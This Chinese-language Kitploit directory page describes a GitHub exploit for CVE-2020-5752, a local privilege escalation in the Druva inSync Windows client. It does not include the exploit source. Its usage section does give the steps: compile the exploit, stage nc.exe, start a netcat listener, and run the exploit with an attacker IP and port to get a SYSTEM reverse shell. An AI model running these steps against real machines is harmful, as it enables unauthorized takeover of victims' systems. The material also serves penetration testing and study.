Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-5752 — Druva 本地权限提升 | Kitploit
工具/GitHubGitHub/x0rbeexd/cve-2020-5752
权限提升漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Druva 本地权限提升

查看仓库
118个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-5752: Druva inSync 本地权限提升

一个基于C的漏洞利用程序,针对Druva inSync Windows客户端(v6.6.3及以下版本)。该应用程序在端口6064上暴露了一个RPC服务,该服务存在通过路径遍历导致的命令注入漏洞。这使得本地用户可以以NT AUTHORITY\SYSTEM权限执行任意命令。

漏洞详情

  • CVE: 2020-5752
  • 测试环境: Windows 10 (x64)
  • 权限级别: 本地权限提升 (LPE)

用法

1. 编译

使用gcc(MinGW)编译源代码:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. 准备

将nc.exe副本放置于SYSTEM账户可访问的目录中(例如C:\Windows\Tasks\)。

3. 执行

在攻击者机器上启动监听器:

root@kitploit:~

nc -lvnp 4444
在目标Windows机器上运行漏洞利用程序:
root@kitploit:~
exploit.exe <攻击者IP> <攻击者端口> <NC路径>
示例:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

免责声明

本工具仅用于教育目的。在未经授权的系统上使用,或对未获得许可的系统进行测试均属违法行为。

下载工具